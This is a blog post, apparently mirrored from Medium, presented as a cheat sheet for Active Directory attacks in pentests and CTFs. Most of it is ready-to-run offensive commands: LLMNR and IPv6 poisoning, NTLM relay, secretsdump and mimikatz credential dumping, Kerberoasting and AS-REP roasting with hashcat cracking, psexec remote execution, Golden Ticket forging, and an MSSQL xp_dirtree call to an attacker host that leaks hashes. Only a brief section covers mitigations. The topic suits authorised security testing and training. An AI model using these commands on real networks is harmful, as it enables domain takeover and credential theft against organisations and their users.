R·D Intel

🏢 Cybersecurity & Bug Bounty Cheat Sheet — Active Directory Attacks & Post-Exploitation | by Eugene Softley (softsec) - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original 🏢 Cybersecurity & Bug Bounty Cheat Sheet — Active Directory Attacks & Post-Exploitation Active Directory (AD) is where things get serious. If you can move inside a domain, escalate privileges, and control identity — you own the… Eugene Softley (softsec) Follow ~3 min read · April 1, 2026 (Updated: April 1, 2026) · Free: Yes Active Directory (AD) is where things get serious . If you can move inside a domain, escalate privileges, and control identity — you own the network. This guide is your practical AD attack playbook for CTFs and real pentests. 🎯 1. Core AD Attack Surface 🔥 High-Value Attack Vectors LLMNR Poisoning SMB Relay mitm6 (IPv6 MITM) Kerberoasting GPP (Group Policy Preferences) EternalBlue (MS17–010) Golden Ticket 👉 These are your fastest paths to domain compromise . ⚡ 2. Fast Pentest Strategy (Real-World) 🧭 Short Engagement Workflow Start poisoning: responder -I eth0 -dwP mitm6 -d domain.local 2. Generate traffic: nmap -sC -sV 3. Look for: SMB signing disabled HTTP services (80/443) Default credentials (Jenkins, printers, CMS) 4. Exploit: ntlmrelayx.py -tf targets.txt -smb2support 🌐 3. Core Ports & Enumeration 📡 RPC (135) rpcclient -U "" Useful RPC Commands: enumdomusers querydispinfo 👉 Enumerate users and sometimes password hints . 📁 SMB (445) 🔍 Share Enumeration smbclient -L cme smb --shares -u user -p '' cme smb --users -u user -p '' 🔓 Password Policy cme smb --pass-pol 👉 If no lockout → bruteforce opportunity 📂 Mount Shares sudo mount -t cifs /// /mnt 🔎 Anonymous Access smbmap -H 🔐 4. Credential Dumping 🧠 Dump Secrets secretsdump.py domain/user:pass@ip 👉 Extract: SAM hashes LSA secrets 🧬 LSASS Dump Analysis pypykatz lsa minidump lsass.dmp 👉 Look for: NTLM hashes Plaintext creds 🔁 5. RID Cycling Attack lookupsid.py domain/user:pass@ip -no-pass 👉 Enumerate users even without full access. 🎫 6. Kerberos Attacks 👥 User Enumeration kerbrute userenum --dc -d domain users.txt 🧪 AS-REP Roasting (No Password Needed) GetNPUsers.py -dc-ip -no-pass -usersfile users.txt domain/ 👉 Crack with: hashcat -m 18200 hashes.txt rockyou.txt 🔥 Kerberoasting (With Credentials) GetUserSPNs.py domain/user:pass -dc-ip -request 👉 Crack: hashcat -m 13100 hashes.txt rockyou.txt 🖥️ 7. Remote Code Execution (RCE) 🧰 Impacket Tools psexec.py domain/user:pass@ip wmiexec.py domain/user:pass@ip smbexec.py domain/user:pass@ip 🧠 WinRM Access evil-winrm -i -u user -H 👉 Always check: whoami /all 👑 8. Golden Ticket Attack 💀 Total Domain Takeover Dump KRBTGT Hash mimikatz lsadump::lsa /inject /name:krbtgt Forge Ticket kerberos::golden /User:FakeAdmin /domain:domain.local /sid: /krbtgt: /ptt 👉 Grants access to ALL machines . 🧨 9. GPP Exploitation (MS14–025) 📂 Find Credentials in SYSVOL smbclient -L // 👉 Look for: SYSVOL → Groups.xml 🔓 Decrypt Password gpp-decrypt 🧠 10. LLMNR Poisoning 🎣 Capture Hashes responder -I eth0 -dwP 👉 Captures NTLMv2 hashes 🔓 Crack hashcat -m 5600 hash.txt rockyou.txt 🌐 11. mitm6 + NTLM Relay ⚡ Attack Flow mitm6 -d domain.local ntlmrelayx.py -6 -t ldaps://DC_IP -wh fake.domain.local -l loot 👉 Dumps: Credentials Domain info 🧬 12. Mimikatz Essentials privilege::debug sekurlsa::logonpasswords lsadump::sam 👉 Capabilities: Credential dumping Pass-the-hash Ticket forging 🔄 13. SMB Relay Attack ⚙️ Setup Responder responder -I eth0 -dwv 👉 Disable: SMB HTTP Auth Proxy 🚀 Launch Relay ntlmrelayx.py -tf targets.txt -smb2support 🎯 Find Vulnerable Hosts nmap --script=smb2-security-mode.nse -p445 10.10.20.0/24 👉 SMB signing must NOT be required. 🧠 14. Post-Exploitation Enumeration 🔍 PowerView powershell -ep bypass . .\PowerView.ps1 Get-NetUser Get-NetDomain 🧬 BloodHound bloodhound.py -u user -p pass -d domain.local -c all 👉 Visualize: Privilege paths Attack chains 🧪 15. Privilege Escalation Checks whoami /priv whoami /groups net user 🔧 PowerUp Invoke-AllChecks 🎣 16. SCF Attack (Hash Capture Trick) Trick victim into loading: @clickme.url 👉 Forces SMB auth → captured by Responder 🗄️ 17. MSSQL Abuse mssqlclient.py user:pass@ip -windows-auth Trigger Auth Leak xp_dirtree "\\attacker-ip\share" 🛡️ 18. Key Mitigations (Blue Team Insight) 🔒 Critical Defenses Enable SMB signing Disable LLMNR & NBT-NS Disable NTLM where possible Enforce strong passwords Limit privileges 🧠 Key Takeaways ✔ AD attacks = identity attacks ✔ Misconfigurations > exploits ✔ Hashes = access ✔ SMB + Kerberos = your main playground #pentesting #active-directory #bug-bounty #ctf #cybersecurity Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).